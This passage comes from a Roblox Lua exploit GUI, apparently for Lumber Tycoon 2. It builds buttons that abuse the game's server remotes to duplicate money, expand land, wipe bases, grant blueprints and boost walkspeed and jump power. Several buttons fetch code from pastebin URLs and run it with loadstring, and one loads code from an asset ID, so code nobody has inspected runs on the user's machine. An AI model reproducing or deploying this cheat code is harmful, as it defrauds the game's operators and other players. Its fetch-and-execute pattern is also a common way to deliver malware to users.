  2793. OpenFrame.Visible = true
  2794. loadstring(game:HttpGet('https://pastebin.com/raw/QS7Te9aP',true))()
  2795. end)
  2796.  
  2797. local BringUp = Instance.new("TextButton")
  2798.  
  2799. BringUp.Name = "BringUp"
  2800. BringUp.Parent = CopyFrame
  2801. BringUp.BackgroundColor3 = Color3.new(0, 0, 0)
  2802. BringUp.BorderColor3 = Color3.new(0, 0, 0)
  2803. BringUp.Position = UDim2.new(0, 3, 0, 256)
  2804. BringUp.Size = UDim2.new(0, 165, 0, 20)
  2805. BringUp.Font = Enum.Font.Fantasy
  2806. BringUp.FontSize = Enum.FontSize.Size18
  2807. BringUp.Text = "BringUp"
  2808. BringUp.TextColor3 = Color3.new(255, 0, 0)
  2809. BringUp.TextSize = 15
  2810. BringUp.MouseButton1Down:connect(function()
  2811. makesound("rbxassetid://156785206")
  2812. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  2813. wait(2.5)
  2814. MainFrame.Visible = false
  2815. OpenFrame.Visible = true
  2816. loadstring(game:GetObjects("rbxassetid://01925396229")[1].Source)()
  2817. end)
  2818.  
  2819.  
  2820. Slot.Name = "Slot"
  2821. Slot.Parent = CopyFrame
  2822. Slot.BackgroundColor3 = Color3.new(0, 0, 0)
  2823. Slot.BorderColor3 = Color3.new(0, 0, 0)
  2824. Slot.Position = UDim2.new(0, 3, 0, 279)
  2825. Slot.Size = UDim2.new(0, 165, 0, 20)
  2826. Slot.Font = Enum.Font.Fantasy
  2827. Slot.FontSize = Enum.FontSize.Size18
  2828. Slot.Text = "Base Slot Number "
  2829. Slot.TextColor3 = Color3.new(1, 1, 1)
  2830. Slot.TextSize = 15
  2831.  
  2832. --Locals
  2833. local MoneyCooldown = false
  2834. local CurrentSlot = game.Players.LocalPlayer:WaitForChild("CurrentSaveSlot").Value
  2835. local ScriptLoad = false
  2836. local CurrentlySavingOrLoading = game.Players.LocalPlayer:WaitForChild("CurrentlySavingOrLoading")
  2837.  
  2838. --Functions
  2839. local function CheckIfSlotAvailable(Slot)
  2840. for a,b in pairs(game.ReplicatedStorage.LoadSaveRequests.GetMetaData:InvokeServer(game.Players.LocalPlayer)) do
  2841. if a == Slot then
  2842. for c,d in pairs(b) do
  2843. if c == "NumSaves" and d ~= 0 then
  2844. return true
  2845. else
  2846. return false
  2847. end
  2848. end
  2849. end
  2850. end
  2851. end
  2852.  
  2853. local function CheckSlotNumber() --Checks if the slot number is right
  2854. if Slot.Text == "1" or Slot.Text == "2" or Slot.Text == "3" or Slot.Text == "4" or Slot.Text == "5" or Slot.Text == "6" then
  2855. local SlotNumber = tonumber(Slot.Text)
  2856. return SlotNumber
  2857. else return false
  2858. end
  2859. end
  2860.  
  2861. local function SendNotification(Title,Text,Duration) -- Sends Notification in the bottom right of the screen
  2862. game.StarterGui:SetCore("SendNotification", {
  2863. Title = Title;
  2864. Text = Text;
  2865. Icon = nil;
  2866. Duration = Duration
  2867. })
  2868. end
  2869.  
  2870. DMoney.Name = "DMoney"
  2871. DMoney.Parent = CopyFrame
  2872. DMoney.BackgroundColor3 = Color3.new(0, 0, 0)
  2873. DMoney.BorderColor3 = Color3.new(0, 0, 0)
  2874. DMoney.Position = UDim2.new(0, 3, 0, 302)
  2875. DMoney.Size = UDim2.new(0, 90, 0, 20)
  2876. DMoney.Font = Enum.Font.Fantasy
  2877. DMoney.FontSize = Enum.FontSize.Size18
  2878. DMoney.Text = "Dupe Money"
  2879. DMoney.TextColor3 = Color3.new(255, 0, 0)
  2880. DMoney.TextSize = 15
  2881. DMoney.MouseButton1Down:connect(function() --Sends the money and will come back after around 2 mins
  2882. makesound("rbxassetid://156785206")
  2883. if MoneyCooldown == true then
  2884. SendNotification("Cooldown Notification", "Wait for your Money to come back",2)
  2885. return
  2886. elseif MoneyCooldown == false then
  2887. MoneyCooldown = true
  2888. SendNotification("Money Sent", "Wait about 2 minutes for your Money to come back", 5)
  2889. game.ReplicatedStorage.Transactions.ClientToServer.Donate:InvokeServer(game.Players.LocalPlayer, game.Players.LocalPlayer.leaderstats.Money.Value, 1)
  2890. SendNotification("Money Received", "You received your money that you have sent earlier", 5)
  2891. MoneyCooldown = false
  2892. end
  2893. end)
  2894.  
  2895. Load.Name = "Load"
  2896. Load.Parent = CopyFrame
  2897. Load.BackgroundColor3 = Color3.new(0, 0, 0)
  2898. Load.BorderColor3 = Color3.new(0, 0, 0)
  2899. Load.Position = UDim2.new(0, 97, 0, 312)
  2900. Load.Size = UDim2.new(0, 70, 0, 20)
  2901. Load.Font = Enum.Font.Fantasy
  2902. Load.FontSize = Enum.FontSize.Size18
  2903. Load.Text = "Load Slot"
  2904. Load.TextColor3 = Color3.new(1, 1, 1)
  2905. Load.TextSize = 15
  2906. Load.MouseButton1Down:connect(function() --Loads the slot you want
  2907. makesound("rbxassetid://156785206")
  2908. ScriptLoad = true
  2909. local CheckSlot = CheckSlotNumber()
  2910. if CheckSlot ~= false then
  2911. if CheckIfSlotAvailable(CheckSlot) == true then
  2912. local LoadSlot = game.ReplicatedStorage.LoadSaveRequests.RequestLoad:InvokeServer(CheckSlot)
  2913. if LoadSlot == false then
  2914. SendNotification("Cooldown Notification", "You aren't abled to load now", 1)
  2915. end
  2916. if LoadSlot == true then
  2917. SendNotification("Reload Notification", "Loaded Your Slot", 2)
  2918. CurrentSlot = CheckSlot
  2919. end
  2920. else
  2921. SendNotification("Slot not Available", "This Slot is not Available, please choose another slot", 2)
  2922. end
  2923. else
  2924. SendNotification("Incorrect Slot", "Enter a Valid number in the upper field", 1)
  2925. end
  2926. ScriptLoad = false
  2927. end)
  2928.  
  2929. Store.Name = "Store"
  2930. Store.Parent = CopyFrame
  2931. Store.BackgroundColor3 = Color3.new(0, 0, 0)
  2932. Store.BorderColor3 = Color3.new(0, 0, 0)
  2933. Store.Position = UDim2.new(0, 3, 0, 325)
  2934. Store.Size = UDim2.new(0, 90, 0, 20)
  2935. Store.Font = Enum.Font.Fantasy
  2936. Store.FontSize = Enum.FontSize.Size18
  2937. Store.Text = "Store Axe"
  2938. Store.TextColor3 = Color3.new(255, 0, 0)
  2939. Store.TextSize = 15
  2940. Store.MouseButton1Down:connect(function() --Stores the Axes somewhere so you can restore them later
  2941. makesound("rbxassetid://156785206")
  2942. Amount = 0
  2943. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren())do
  2944. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  2945. b.Parent = game.Players.LocalPlayer
  2946. Amount = Amount + 1
  2947. end
  2948. end
  2949. SendNotification("Store Notification", "Stored "..Amount.." Axes, you can restore them later", 2)
  2950. end)
  2951.  
  2952. Restore.Name = "Restore"
  2953. Restore.Parent = CopyFrame
  2954. Restore.BackgroundColor3 = Color3.new(0, 0, 0)
  2955. Restore.BorderColor3 = Color3.new(0, 0, 0)
  2956. Restore.Position = UDim2.new(0, 3, 0, 348)
  2957. Restore.Size = UDim2.new(0, 165, 0, 20)
  2958. Restore.Font = Enum.Font.Fantasy
  2959. Restore.FontSize = Enum.FontSize.Size18
  2960. Restore.Text = "Restore Axe"
  2961. Restore.TextColor3 = Color3.new(1, 1, 1)
  2962. Restore.TextSize = 15
  2963. Restore.MouseButton1Down:connect(function() --Restores the axes that you stored with the Store function
  2964. makesound("rbxassetid://156785206")
  2965. Amount = 0
  2966. for a,b in pairs(game.Players.LocalPlayer:GetChildren()) do
  2967. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  2968. b.Parent = game.Players.LocalPlayer.Backpack
  2969. Amount = Amount + 1
  2970. end
  2971. end
  2972. SendNotification("Restore Notification", "Restored "..Amount.." Axes that you Stored", 2)
  2973. end)
  2974.  
  2975. SaveSlot.Name = "SaveSlot"
  2976. SaveSlot.Parent = CopyFrame
  2977. SaveSlot.BackgroundColor3 = Color3.new(0, 0, 0)
  2978. SaveSlot.BorderColor3 = Color3.new(0, 0, 0)
  2979. SaveSlot.Position = UDim2.new(0, 3, 0, 371)
  2980. SaveSlot.Size = UDim2.new(0, 165, 0, 20)
  2981. SaveSlot.Font = Enum.Font.Fantasy
  2982. SaveSlot.FontSize = Enum.FontSize.Size18
  2983. SaveSlot.Text = "SaveSlot "
  2984. SaveSlot.TextColor3 = Color3.new(1, 1, 1)
  2985. SaveSlot.TextSize = 15
  2986. SaveSlot.MouseButton1Down:connect(function() --Saves the slot that you want
  2987. makesound("rbxassetid://156785206")
  2988. local CheckSlot = CheckSlotNumber()
  2989. if CheckSlot ~= false then
  2990. if CurrentSlot ~= -1 then
  2991. local SaveSlot = game.ReplicatedStorage.LoadSaveRequests.RequestSave:InvokeServer(CheckSlot)
  2992. if SaveSlot == true then
  2993. SendNotification("Save Notification", "Saved your Slot", 2)
  2994. elseif SaveSlot == false then
  2995. SendNotification("Already Saving", "Saving/Loading is currently in Progress", 1)
  2996. end
  2997. else
  2998. SendNotification("Error", "Load Your Slot First before saving", 1)
  2999. end
  3000. else
  3001. SendNotification("Incorrect Slot", "Enter a number in the upper field", 1)
  3002. end
  3003. end)
  3004.  
  3005. DropAxes.Name = "DropAxes"
  3006. DropAxes.Parent = CopyFrame
  3007. DropAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  3008. DropAxes.BorderColor3 = Color3.new(0, 0, 0)
  3009. DropAxes.Position = UDim2.new(0, 3, 0, 417)
  3010. DropAxes.Size = UDim2.new(0, 165, 0, 20)
  3011. DropAxes.Font = Enum.Font.Fantasy
  3012. DropAxes.FontSize = Enum.FontSize.Size18
  3013. DropAxes.Text = "Drop Axes "
  3014. DropAxes.TextColor3 = Color3.new(255, 0, 0)
  3015. DropAxes.TextSize = 15
  3016. DropAxes.MouseButton1Down:connect(function() --Drops all your Axes
  3017. makesound("rbxassetid://156785206")
  3018. Amount = 0
  3019. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  3020. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  3021. game.ReplicatedStorage.Interaction.ClientInteracted:FireServer(b, "Drop tool", game.Players.LocalPlayer.Character.Head.CFrame)
  3022. Amount = Amount + 1
  3023. end
  3024. end
  3025. SendNotification("Axe Dropped", "Dropped "..Amount.." Axes from your Backpack",5)
  3026. end)
  3027.  
  3028. CountAxes.Name = "CountAxes"
  3029. CountAxes.Parent = CopyFrame
  3030. CountAxes.BackgroundColor3 = Color3.new(0, 0, 0)
  3031. CountAxes.BorderColor3 = Color3.new(0, 0, 0)
  3032. CountAxes.Position = UDim2.new(0, 3, 0, 394)
  3033. CountAxes.Size = UDim2.new(0, 165, 0, 20)
  3034. CountAxes.Font = Enum.Font.Fantasy
  3035. CountAxes.FontSize = Enum.FontSize.Size18
  3036. CountAxes.Text = "Count Axes "
  3037. CountAxes.TextColor3 = Color3.new(255, 0, 0)
  3038. CountAxes.TextSize = 15
  3039. CountAxes.MouseButton1Down:connect(function() --Counts Axes in your Backpack (Equiped Axes dont Count)
  3040. makesound("rbxassetid://156785206")
  3041. Amount = 0
  3042. for a,b in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  3043. if b.Name ~= "BlueprintTool" and b.Name == "Tool" then
  3044. Amount = Amount + 1
  3045. end
  3046. end
  3047. SendNotification("Axe Amount", "You have "..Amount.." Axes in your Backpack",2)
  3048. end)
  3049.  
  3050. Artmenu.Name = "Artmenu"
  3051. Artmenu.Parent = Picker
  3052. Artmenu.BackgroundColor3 = Color3.new(1, 1, 1)
  3053. Artmenu.BorderColor3 = Color3.new(0, 0, 0)
  3054. Artmenu.Position = UDim2.new(0, 15, 0, 345)
  3055. Artmenu.Size = UDim2.new(0, 80, 0, 80)
  3056. Artmenu.ZIndex = 3
  3057. Artmenu.Image = "rbxassetid://3907587419"
  3058. Artmenu.ScaleType = Enum.ScaleType.Crop
  3059. Artmenu.MouseButton1Click:Connect(function()
  3060. CurrentItem.Image = "rbxassetid://3886256996"
  3061. makesound("rbxassetid://156785206")
  3062. AIntroImage.Visible = true
  3063. AIntroImage1.Visible = true
  3064. end)
  3065.  
  3066.  
  3067. ArtFrame.Name = "ArtFrame"
  3068. ArtFrame.Parent = MenuFrame
  3069. ArtFrame.BorderSizePixel = 1
  3070. ArtFrame.BackgroundTransparency = 0
  3071. ArtFrame.BorderColor3 = Color3.new(0, 0, 0)
  3072. ArtFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  3073. ArtFrame.Size = UDim2.new(0, 170, 0, 280)
  3074. ArtFrame.Visible = false
  3075.  
  3076. Paint.Name = "Paint"
  3077. Paint.Parent = ArtFrame
  3078. Paint.BackgroundColor3 = Color3.new(0, 0, 0)
  3079. Paint.BorderColor3 = Color3.new(0, 0, 0)
  3080. Paint.Position = UDim2.new(0, 3, 0, 3)
  3081. Paint.Size = UDim2.new(0, 165, 0, 20)
  3082. Paint.Font = Enum.Font.Fantasy
  3083. Paint.Text = "Paint"
  3084. Paint.TextColor3 = Color3.new(255, 0, 0)
  3085. Paint.TextSize = 15
  3086. Paint.MouseButton1Down:connect(function()
  3087. makesound("rbxassetid://156785206")
  3088. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3089. wait(2.5)
  3090. MainFrame.Visible = false
  3091. OpenFrame.Visible = true
  3092. loadstring(game:HttpGet('https://pastebin.com/raw/KwtFxY8L',true))()
  3093. end)
  3094.  
  3095.  
  3096. PaintFill.Name = "PaintFill"
  3097. PaintFill.Parent = ArtFrame
  3098. PaintFill.BackgroundColor3 = Color3.new(0, 0, 0)
  3099. PaintFill.BorderColor3 = Color3.new(0, 0, 0)
  3100. PaintFill.Position = UDim2.new(0, 3, 0, 26)
  3101. PaintFill.Size = UDim2.new(0, 165, 0, 20)
  3102. PaintFill.Font = Enum.Font.Fantasy
  3103. PaintFill.FontSize = Enum.FontSize.Size18
  3104. PaintFill.Text = "Paint Fill"
  3105. PaintFill.TextColor3 = Color3.new(255, 0, 0)
  3106. PaintFill.TextSize = 15
  3107. PaintFill.MouseButton1Down:connect(function()
  3108. makesound("rbxassetid://156785206")
  3109. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3110. wait(2.5)
  3111. MainFrame.Visible = false
  3112. OpenFrame.Visible = true
  3113. loadstring(game:HttpGet('https://pastebin.com/raw/sc0gEqX5',true))()
  3114. end)
  3115.  
  3116.  
  3117.  
  3118. BaseFLOOR.Name = "BaseFLOOR"
  3119. BaseFLOOR.Parent = ArtFrame
  3120. BaseFLOOR.BackgroundColor3 = Color3.new(0, 0, 0)
  3121. BaseFLOOR.BorderColor3 = Color3.new(0, 0, 0)
  3122. BaseFLOOR.Position = UDim2.new(0, 3, 0, 49)
  3123. BaseFLOOR.Size = UDim2.new(0, 165, 0, 20)
  3124. BaseFLOOR.Font = Enum.Font.Fantasy
  3125. BaseFLOOR.FontSize = Enum.FontSize.Size18
  3126. BaseFLOOR.Text = "Base Floor Prints"
  3127. BaseFLOOR.TextColor3 = Color3.new(255, 0, 0)
  3128. BaseFLOOR.TextSize = 15
  3129. BaseFLOOR.MouseButton1Down:connect(function()
  3130. makesound("rbxassetid://156785206")
  3131. loadstring(game:HttpGet('https://pastebin.com/raw/M4qfj349',true))()
  3132.  
  3133. end)
  3134.  
  3135. SingleWalls.Name = "SingleWalls"
  3136. SingleWalls.Parent = ArtFrame
  3137. SingleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3138. SingleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3139. SingleWalls.Position = UDim2.new(0, 3, 0, 72)
  3140. SingleWalls.Size = UDim2.new(0, 165, 0, 20)
  3141. SingleWalls.Font = Enum.Font.Fantasy
  3142. SingleWalls.FontSize = Enum.FontSize.Size18
  3143. SingleWalls.Text = "Single Wall Prints"
  3144. SingleWalls.TextColor3 = Color3.new(255, 0, 0)
  3145. SingleWalls.TextSize = 15
  3146. SingleWalls.MouseButton1Down:connect(function()
  3147. makesound("rbxassetid://156785206")
  3148. loadstring(game:HttpGet('https://pastebin.com/raw/vaDSYZcr',true))()
  3149.  
  3150. end)
  3151.  
  3152. DoubleWalls.Name = "DoubleWalls"
  3153. DoubleWalls.Parent = ArtFrame
  3154. DoubleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3155. DoubleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3156. DoubleWalls.Position = UDim2.new(0, 3, 0, 95)
  3157. DoubleWalls.Size = UDim2.new(0, 165, 0, 20)
  3158. DoubleWalls.Font = Enum.Font.Fantasy
  3159. DoubleWalls.FontSize = Enum.FontSize.Size18
  3160. DoubleWalls.Text = "Double Wall Prints"
  3161. DoubleWalls.TextColor3 = Color3.new(255, 0, 0)
  3162. DoubleWalls.TextSize = 15
  3163. DoubleWalls.MouseButton1Down:connect(function()
  3164. makesound("rbxassetid://156785206")
  3165. loadstring(game:HttpGet('https://pastebin.com/raw/VMzdN1b1',true))()
  3166.  
  3167. end)
  3168.  
  3169. TripleWalls.Name = "TripleWalls"
  3170. TripleWalls.Parent = ArtFrame
  3171. TripleWalls.BackgroundColor3 = Color3.new(0, 0, 0)
  3172. TripleWalls.BorderColor3 = Color3.new(0, 0, 0)
  3173. TripleWalls.Position = UDim2.new(0, 3, 0, 118)
  3174. TripleWalls.Size = UDim2.new(0, 165, 0, 20)
  3175. TripleWalls.Font = Enum.Font.Fantasy
  3176. TripleWalls.FontSize = Enum.FontSize.Size18
  3177. TripleWalls.Text = "Triple Wall Prints"
  3178. TripleWalls.TextColor3 = Color3.new(255, 0, 0)
  3179. TripleWalls.TextSize = 15
  3180. TripleWalls.MouseButton1Down:connect(function()
  3181. makesound("rbxassetid://156785206")
  3182. loadstring(game:HttpGet('https://pastebin.com/raw/WGjKAWCp',true))()
  3183.  
  3184. end)
  3185.  
  3186. Hoofer.Name = "Hoofer"
  3187. Hoofer.Parent = ArtFrame
  3188. Hoofer.BackgroundColor3 = Color3.new(0, 0, 0)
  3189. Hoofer.BorderColor3 = Color3.new(0, 0, 0)
  3190. Hoofer.Position = UDim2.new(0, 3, 0, 141)
  3191. Hoofer.Size = UDim2.new(0, 165, 0, 20)
  3192. Hoofer.Font = Enum.Font.Fantasy
  3193. Hoofer.FontSize = Enum.FontSize.Size18
  3194. Hoofer.Text = "Hoofer Art Gui"
  3195. Hoofer.TextColor3 = Color3.new(255, 0, 0)
  3196. Hoofer.TextSize = 15
  3197. Hoofer.MouseButton1Down:connect(function()
  3198. makesound("rbxassetid://156785206")
  3199. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3200. wait(2.5)
  3201. MainFrame.Visible = false
  3202. OpenFrame.Visible = true
  3203. loadstring(game:HttpGet('https://pastebin.com/raw/byWaCwR8',true))()
  3204. end)
  3205.  
  3206. Landart.Name = "Landart"
  3207. Landart.Parent = ArtFrame
  3208. Landart.BackgroundColor3 = Color3.new(0, 0, 0)
  3209. Landart.BorderColor3 = Color3.new(0, 0, 0)
  3210. Landart.Position = UDim2.new(0, 3, 0, 164)
  3211. Landart.Size = UDim2.new(0, 165, 0, 20)
  3212. Landart.Font = Enum.Font.Fantasy
  3213. Landart.FontSize = Enum.FontSize.Size18
  3214. Landart.Text = "Custom Land Art"
  3215. Landart.TextColor3 = Color3.new(255, 0, 0)
  3216. Landart.TextSize = 15
  3217. Landart.MouseButton1Down:connect(function()
  3218. makesound("rbxassetid://156785206")
  3219. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  3220. wait(2.5)
  3221. MainFrame.Visible = false
  3222. OpenFrame.Visible = true
  3223. loadstring(game:HttpGet('https://pastebin.com/raw/Thdycw8W',true))()
  3224. end)
  3225.  
  3226. BluePrints.Name = "BluePrints"
  3227. BluePrints.Parent = ArtFrame
  3228. BluePrints.BackgroundColor3 = Color3.new(0, 0, 0)
  3229. BluePrints.BorderColor3 = Color3.new(0, 0, 0)
  3230. BluePrints.Position = UDim2.new(0, 3, 0, 187)
  3231. BluePrints.Size = UDim2.new(0, 165, 0, 20)
  3232. BluePrints.Font = Enum.Font.Fantasy
  3233. BluePrints.FontSize = Enum.FontSize.Size18
  3234. BluePrints.Text = "BluePrints"
  3235. BluePrints.TextColor3 = Color3.new(255, 0, 0)
  3236. BluePrints.TextSize = 15
  3237. BluePrints.MouseButton1Down:connect(function()
  3238. makesound("rbxassetid://156785206")
  3239. for i,v in pairs(game.ReplicatedStorage.Purchasables.Structures.BlueprintStructures:GetChildren()) do
  3240. local clone = v:Clone()
  3241. clone.Parent = game.Players.LocalPlayer.PlayerBlueprints.Blueprints
  3242. end
  3243. end)
  3244.  
  3245.  
  3246. MaxLand.Name = "MaxLand"
  3247. MaxLand.Parent = ArtFrame
  3248. MaxLand.BackgroundColor3 = Color3.new(0, 0, 0)
  3249. MaxLand.BorderColor3 = Color3.new(0, 0, 0)
  3250. MaxLand.Position = UDim2.new(0, 3, 0, 210)
  3251. MaxLand.Size = UDim2.new(0, 165, 0, 20)
  3252. MaxLand.Font = Enum.Font.Fantasy
  3253. MaxLand.FontSize = Enum.FontSize.Size18
  3254. MaxLand.Text = "MaxLand"
  3255. MaxLand.TextColor3 = Color3.new(255, 0, 0)
  3256. MaxLand.TextSize = 15
  3257. MaxLand.MouseButton1Down:connect(function()
  3258. makesound("rbxassetid://156785206")
  3259. for i, v in pairs(game:GetService("Workspace").Properties:GetChildren()) do
  3260. if v:FindFirstChild("Owner") and v.Owner.Value == game.Players.LocalPlayer then
  3261. base = v
  3262. square = v.OriginSquare
  3263. end
  3264. end
  3265. function makebase(pos)
  3266. local Event = game:GetService("ReplicatedStorage").PropertyPurchasing.ClientExpandedProperty
  3267. Event:FireServer(base, pos)
  3268. end
  3269. spos = square.Position
  3270. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z))
  3271. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z))
  3272. makebase(CFrame.new(spos.X, spos.Y, spos.Z + 40))
  3273. makebase(CFrame.new(spos.X, spos.Y, spos.Z - 40))
  3274. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z + 40))
  3275. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z - 40))
  3276. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z + 40))
  3277. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z - 40))
  3278. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z))
  3279. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z))
  3280. makebase(CFrame.new(spos.X, spos.Y, spos.Z + 80))
  3281. makebase(CFrame.new(spos.X, spos.Y, spos.Z - 80))
  3282. --Corners--
  3283. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z + 80))
  3284. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z - 80))
  3285. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z + 80))
  3286. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z - 80))
  3287. --Corners--
  3288. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z + 80))
  3289. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z + 80))
  3290. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z + 40))
  3291. makebase(CFrame.new(spos.X + 80, spos.Y, spos.Z - 40))
  3292. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z + 40))
  3293. makebase(CFrame.new(spos.X - 80, spos.Y, spos.Z - 40))
  3294. makebase(CFrame.new(spos.X + 40, spos.Y, spos.Z - 80))
  3295. makebase(CFrame.new(spos.X - 40, spos.Y, spos.Z - 80))
  3296.  
  3297. end)
  3298.  
  3299.  
  3300.  
  3301. WipeBase.Name = "WipeBase"
  3302. WipeBase.Parent = ArtFrame
  3303. WipeBase.BackgroundColor3 = Color3.new(0, 0, 0)
  3304. WipeBase.BorderColor3 = Color3.new(0, 0, 0)
  3305. WipeBase.Position = UDim2.new(0, 3, 0, 233)
  3306. WipeBase.Size = UDim2.new(0, 165, 0, 20)
  3307. WipeBase.Font = Enum.Font.Fantasy
  3308. WipeBase.FontSize = Enum.FontSize.Size18
  3309. WipeBase.Text = "Wipe Base"
  3310. WipeBase.TextColor3 = Color3.new(255, 0, 0)
  3311. WipeBase.TextSize = 15
  3312. WipeBase.MouseButton1Down:Connect(function()
  3313. makesound("rbxassetid://156785206")
  3314. plr = game.Players.LocalPlayer.Name
  3315. pmds = game.Workspace.PlayerModels
  3316. PlaceR = game.ReplicatedStorage.Interaction.DestroyStructure
  3317. for i, v in pairs(pmds:GetChildren()) do
  3318. if v:FindFirstChild("Owner") and v.Owner.Value ~= nil and v.Owner.Value == game.Players[plr] and v:FindFirstChild("ItemName") and v:FindFirstChild("Type") and (v.PrimaryPart ~= nil or v:FindFirstChild("MainCFrame")) then
  3319. PlaceR:FireServer(v)
  3320. end
  3321. end
  3322. end)
  3323.  
  3324. WCollide = "Nothing"
  3325.  
  3326. toolamenu.Name = "toolamenu"
  3327. toolamenu.Parent = Picker
  3328. toolamenu.BackgroundColor3 = Color3.new(1, 1, 1)
  3329. toolamenu.BorderColor3 = Color3.new(0, 0, 0)
  3330. toolamenu.Position = UDim2.new(0, 15, 0,430)
  3331. toolamenu.Size = UDim2.new(0, 80, 0, 80)
  3332. toolamenu.ZIndex = 3
  3333. toolamenu.Image = "rbxassetid://3916428981"
  3334. toolamenu.ScaleType = Enum.ScaleType.Crop
  3335. toolamenu.MouseButton1Click:Connect(function()
  3336. CurrentItem.Image = "rbxassetid://3886256996"
  3337. makesound("rbxassetid://156785206")
  3338. AIntroImage.Visible = false
  3339. AIntroImage1.Visible = false
  3340.  
  3341. end)
  3342.  
  3343. toolaFrame.Name = "toolaFrame"
  3344. toolaFrame.Parent = MenuFrame
  3345. toolaFrame.BorderSizePixel = 1
  3346. toolaFrame.BackgroundTransparency = 0
  3347. toolaFrame.BorderColor3 = Color3.new(0, 0, 0)
  3348. toolaFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  3349. toolaFrame.Size = UDim2.new(0, 170, 0, 442)
  3350. toolaFrame.Visible = false
  3351.  
  3352. JumpText.Name = "JumpText"
  3353. JumpText.Parent = toolaFrame
  3354. JumpText.BackgroundColor3 = Color3.new(0, 0, 0)
  3355. JumpText.BorderColor3 = Color3.new(0, 0, 0)
  3356. JumpText.Position = UDim2.new(0, 147, 0, 26)
  3357. JumpText.Size = UDim2.new(0, 21, 0, 20)
  3358. JumpText.Font = Enum.Font.Fantasy
  3359. JumpText.FontSize = Enum.FontSize.Size18
  3360. JumpText.Text = "50"
  3361. JumpText.TextColor3 = Color3.new(255, 0, 0)
  3362. JumpText.TextSize = 15
  3363.  
  3364. JumpPower.Name = "JumpPowerLabel"
  3365. JumpPower.Parent = toolaFrame
  3366. JumpPower.BackgroundColor3 = Color3.new(0, 0, 0)
  3367. JumpPower.BorderColor3 = Color3.new(0, 0, 0)
  3368. JumpPower.Position = UDim2.new(0, 3, 0, 26)
  3369. JumpPower.Size = UDim2.new(0, 140, 0, 20)
  3370. JumpPower.Font = Enum.Font.Fantasy
  3371. JumpPower.FontSize = Enum.FontSize.Size18
  3372. JumpPower.Text = "Jump Power"
  3373. JumpPower.TextColor3 = Color3.new(255, 0, 0)
  3374. JumpPower.TextSize = 15
  3375.  
  3376. player = game.Players.LocalPlayer
  3377. Jump = 50
  3378.  
  3379. JumpPower.MouseButton1Down:connect(function()
  3380. Jump = JumpText.Text
  3381. end)
  3382.  
  3383. player.Character.Humanoid.JumpPower = Jump
  3384.  
  3385. player.Character.Humanoid.Changed:connect(function()
  3386. player.Character.Humanoid.JumpPower = Jump
  3387.  
  3388. end)
  3389.  
  3390. WalkspeedLabel.Name = "WalkspeedLabel"
  3391. WalkspeedLabel.Parent = toolaFrame
  3392. WalkspeedLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  3393. WalkspeedLabel.BorderColor3 = Color3.new(0, 0, 0)
  3394. WalkspeedLabel.Position = UDim2.new(0, 3, 0, 3)
  3395. WalkspeedLabel.Size = UDim2.new(0, 140, 0, 20)
  3396. WalkspeedLabel.Font = Enum.Font.Fantasy
  3397. WalkspeedLabel.FontSize = Enum.FontSize.Size18
  3398. WalkspeedLabel.Text = "Walkspeed"
  3399. WalkspeedLabel.TextColor3 = Color3.new(255, 0, 0)
  3400. WalkspeedLabel.TextSize = 15
  3401.  
  3402. WalkSpeed.Name = "WalkSpeed"
  3403. WalkSpeed.Parent = toolaFrame
  3404. WalkSpeed.BackgroundColor3 = Color3.new(0, 0, 0)
  3405. WalkSpeed.BorderColor3 = Color3.new(0, 0, 0)
  3406. WalkSpeed.Position = UDim2.new(0, 147, 0, 3)
  3407. WalkSpeed.Size = UDim2.new(0, 21, 0, 20)
  3408. WalkSpeed.Font = Enum.Font.Fantasy
  3409. WalkSpeed.FontSize = Enum.FontSize.Size18
  3410. WalkSpeed.Text = "V"
  3411. WalkSpeed.TextColor3 = Color3.new(255, 0, 0)
  3412. WalkSpeed.TextSize = 15
  3413.  
  3414. WalkspeedLabel.MouseButton1Down:connect(function()
  3415. local walkspeedplayer = game:GetService("Players").LocalPlayer
  3416. local walkspeedmouse = walkspeedplayer:GetMouse()
  3417.  
  3418. local walkspeedenabled = false
  3419.  
  3420. function x_walkspeed(key)
  3421. if (key == "v") then
  3422. if walkspeedenabled == false then
  3423. _G.WS = 150;
  3424.  
  3425. local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid;
  3426. Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
  3427. Humanoid.WalkSpeed = _G.WS;
  3428. end)
  3429. Humanoid.WalkSpeed = _G.WS;
  3430.  
  3431. walkspeedenabled = true
  3432. elseif walkspeedenabled == true then
  3433. _G.WS = 15;
